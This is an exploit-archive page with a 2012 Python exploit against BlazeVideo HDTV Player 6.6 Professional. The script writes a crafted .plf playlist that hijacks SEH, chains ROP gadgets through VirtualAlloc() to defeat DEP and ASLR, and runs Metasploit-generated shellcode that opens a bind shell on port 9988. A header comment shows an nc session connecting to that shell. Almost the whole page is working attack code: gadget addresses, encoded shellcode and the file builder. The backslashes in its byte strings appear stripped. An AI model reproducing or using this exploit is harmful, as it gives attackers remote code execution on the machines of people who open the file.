[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR
# Published : 2012-04-03
# Author :
# Previous Title : ZipItFast PRO v3.0 Heap Overflow Exploit
# Next Title : Python Untrusted Search Path/Code Execution Vulnerability
#!/usr/bin/python -w
#-----------------------------------------------------------------------------------#
# Exploit: BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR #
# Author: b33f - http://www.fuzzysecurity.com/ #
# OS: Tested on Windows 7 32-bit PRO SP1 #
# Software Link: http://www.blazevideo.com/download.htm #
# Pro v6.6 - Apr 12, 2011 #
#-----------------------------------------------------------------------------------#
# The opportunity to secure ourselves against defeat lies in our own hands #
# but the opportunity of defeating the enemy is provided by the enemy himself. #
# - Sun Tzu #
#-----------------------------------------------------------------------------------#
# Special thanks: #
# Lincoln - Thx for the assist! #
# corelanc0d3r - Thx for taking the time to go over my work and pointing me #
# at VirtualAlloc()! #
#-----------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.129 9988 #
# (UNKNOWN) [192.168.111.129] 9988 (?) open #
# Microsoft Windows [Version 6.1.7601] #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
# #
# C:Program FilesBlazeVideoBlazeVideo HDTV Player 6.6 Professional> #
#-----------------------------------------------------------------------------------#
filename="blaze.plf"
#-----------------------------Pivot-Align-----------------------------#
SEH = "x95x53x30x61" # Pivot; ADD ESP,800 # RETN
pad = "b33f"*35 # pad ESP to our alignment (140-bytes)
#------------------Save Stack Pointer in EDI&EAX&ESI------------------#
stack = (
"xC5x30x03x64" # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN
"x41x41x41x41" # Padding for POP ESI
"x24x60x02x64" # PUSH ESP # POP ESI # RETN
"xEEx65x03x64" # XCHG EAX,ESI # RETN
"x24x60x02x64" # PUSH ESP # POP ESI # RETN
"xBFxCDx02x64") # ADD ESP,20 # RETN
#----------------------------VirtualAlloc()---------------------------#
params = (
"xB4x11x34x60" # VirtualAlloc()
"WWWW" # lpAddress We need this value twice for alignment!
"WWWW" # lpAddress /
"XXXX" # dwSize (0x1)
"YYYY" # flAllocationType (0x1000)
"ZZZZ" # flProtect (0x40)
"x41x41x41x41" # Padding
"x41x41x41x41") # Padding
#-----------------------ROP Chain - lpAddress-------------------------#
rop = (
"xF7x24x03x64" # ADD EAX,20 # RETN
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN | ADD EAX 1E0
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN |
"xF7x24x03x64" # ADD EAX,20 # RETN /
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN |
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | DEC ESI 8
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | We need lpAddress twice to return to the proper
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | place after executing VirtualAlloc(), the lpAddress
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | parameters are located at ESI+10 and ESI+14
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN |
"xCBx06x11x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN /
"xCAxB5x33x60" # MOV DWORD PTR DS:[ESI+10],EAX # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41" # Padding for POP ESI
"x41x41x41x41" # Padding for POP EBX
#------------------------ROP Chain - dwSize---------------------------#
"xD3xB1x04x64" # PUSH EAX # POP ESI # RETN 04
"xCAx71x04x64" # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"x41x41x41x41" # Padding for RETN 04
"x6DxA1x03x64" # INC EAX # RETN
"x41x41x41x41" # Padding for RETN 04
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x90x73x64x61" # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41" # Padding for POP ESI
"x41x41x41x41" # Padding for POP EBX
#-------------------ROP Chain - flAllocationType----------------------#
"xD3xB1x04x64" # PUSH EAX # POP ESI # RETN 04
"xCAx71x04x64" # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"x41x41x41x41" # Padding for RETN 04
"x13x30x10x64" # POP EAX # RETN
"x41x41x41x41" # Padding for RETN 04
"xFFxEFxFFxFF" # 0xFFFFEFFF
"xCBx6Ex33x61" # NEG EAX # RETN
"x2Cx4Ex10x64" # DEC EAX # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x90x73x64x61" # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41" # Padding for POP ESI
"x41x41x41x41" # Padding for POP EBX
#-----------------------ROP Chain - flProtect-------------------------#
"xD3xB1x04x64" # PUSH EAX # POP ESI # RETN 04
"xCAx71x04x64" # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"x41x41x41x41" # Padding for RETN 04
"xF7x24x03x64" # ADD EAX,20 # RETN
"x41x41x41x41" # Padding for RETN 04
"xF7x24x03x64" # ADD EAX,20 # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x15x14x03x64" # INC ESI # RETN
"x90x73x64x61" # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41" # Padding for POP ESI
"x41x41x41x41" # Padding for POP EBX
#-----------------ROP Chain - Fix PTR VirtualAlloc()------------------#
"xD3xB1x04x64" # PUSH EAX # POP ESI # RETN 04
"x0BxA8x03x64" # MOV EAX,DWORD PTR DS:[EAX] # RETN
"x41x41x41x41" # Padding for RETN 04
"x0BxA8x03x64" # MOV EAX,DWORD PTR DS:[EAX] # RETN
"x64x40x04x64" # MOV DWORD PTR DS:[ESI],EAX # POP ESI # RETN
"x41x41x41x41" # Padding for POP ESI
"x16xA4x04x64" # MOV EAX,EDI # POP EDI # POP ESI # RETN
"x41x41x41x41" # Padding for POP EDI
"x41x41x41x41" # Padding for POP ESI
"x6DxA1x03x64" # INC EAX # RETN
"x6DxA1x03x64" # INC EAX # RETN
"x6DxA1x03x64" # INC EAX # RETN
"x6DxA1x03x64" # INC EAX # RETN
"xC6x2Ax03x64") # PUSH EAX # POP ESP # RETN
#-------------------------------------------------------------------------------------#
# We have an ample amount of space... #
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #
# [*] x86/alpha_mixed succeeded with size 743 (iteration=1) #
#-------------------------------------------------------------------------------------#
shellcode = (
"x89xe5xdaxd8xd9x75xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x39"
"x6cx79x78x6bx39x63x30x57x70x55x50x31x70x6bx39"
"x39x75x30x31x78x52x45x34x6ex6bx70x52x36x50x6e"
"x6bx32x72x34x4cx4cx4bx50x52x77x64x4cx4bx50x72"
"x74x68x54x4fx68x37x31x5ax51x36x65x61x6bx4fx74"
"x71x59x50x6ex4cx75x6cx75x31x53x4cx63x32x54x6c"
"x31x30x4fx31x38x4fx44x4dx56x61x78x47x6bx52x78"
"x70x76x32x73x67x4ex6bx43x62x52x30x4ex6bx70x42"
"x37x4cx43x31x4ax70x4ex6bx67x30x42x58x6dx55x6f"
"x30x31x64x62x6ax37x71x7ax70x62x70x4ex6bx42x68"
"x72x38x6ex6bx32x78x75x70x67x71x4bx63x6dx33x45"
"x6cx73x79x4cx4bx57x44x6ex6bx43x31x5ax76x66x51"
"x4bx4fx65x61x79x50x6ex4cx6fx31x38x4fx44x4dx36"
"x61x48x47x47x48x6dx30x53x45x6cx34x56x63x51x6d"
"x58x78x55x6bx63x4dx55x74x61x65x6ax42x36x38x4c"
"x4bx36x38x77x54x36x61x38x53x31x76x4ex6bx34x4c"
"x72x6bx4cx4bx53x68x67x6cx77x71x39x43x4ex6bx66"
"x64x4cx4bx43x31x48x50x4cx49x53x74x35x74x35x74"
"x43x6bx33x6bx30x61x73x69x71x4ax62x71x49x6fx6d"
"x30x50x58x31x4fx61x4ax4ex6bx42x32x38x6bx6dx56"
"x43x6dx33x58x75x63x74x72x57x70x35x50x50x68x42"
"x57x51x63x70x32x43x6fx73x64x33x58x32x6cx51x67"
"x56x46x76x67x6bx4fx4bx65x6fx48x6cx50x63x31x63"
"x30x73x30x37x59x78x44x72x74x32x70x55x38x64x69"
"x6dx50x50x6bx43x30x69x6fx4ex35x72x70x72x70x56"
"x30x42x70x63x70x50x50x61x50x62x70x30x68x79x7a"
"x76x6fx4bx6fx6dx30x59x6fx79x45x4ex69x79x57x44"
"x71x39x4bx56x33x65x38x76x62x35x50x57x57x76x64"
"x6dx59x6bx56x51x7ax62x30x33x66x56x37x65x38x59"
"x52x49x4bx77x47x55x37x59x6fx59x45x46x33x51x47"
"x45x38x6cx77x39x79x65x68x39x6fx59x6fx6bx65x46"
"x33x56x33x73x67x72x48x74x34x7ax4cx37x4bx59x71"
"x6bx4fx68x55x61x47x6fx79x78x47x43x58x50x75x62"
"x4ex70x4dx53x51x49x6fx7ax75x35x38x32x43x30x6d"
"x42x44x75x50x6cx49x48x63x72x77x46x37x33x67x56"
"x51x69x66x42x4ax57x62x50x59x70x56x59x72x69x6d"
"x43x56x4bx77x77x34x75x74x77x4cx77x71x56x61x4c"
"x4dx37x34x31x34x44x50x58x46x37x70x51x54x31x44"
"x52x70x42x76x46x36x51x46x67x36x43x66x50x4ex43"
"x66x42x76x43x63x71x46x45x38x53x49x48x4cx37x4f"
"x4bx36x59x6fx58x55x4bx39x6bx50x62x6ex56x36x61"
"x56x4bx4fx30x30x31x78x77x78x4ex67x47x6dx33x50"
"x49x6fx6bx65x4dx6bx48x70x6dx65x4ex42x32x76x65"
"x38x59x36x4fx65x6fx4dx4dx4dx49x6fx78x55x47x4c"
"x33x36x71x6cx57x7ax4bx30x39x6bx6bx50x53x45x64"
"x45x4fx4bx53x77x75x43x44x32x50x6fx32x4ax43x30"
"x50x53x49x6fx48x55x41x41")
ph33r = "x90"*160 + shellcode
b00m = SEH + pad + stack + params + rop + ph33r
buffer = "A"*872 + b00m + "B"*(4128-len(b00m))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()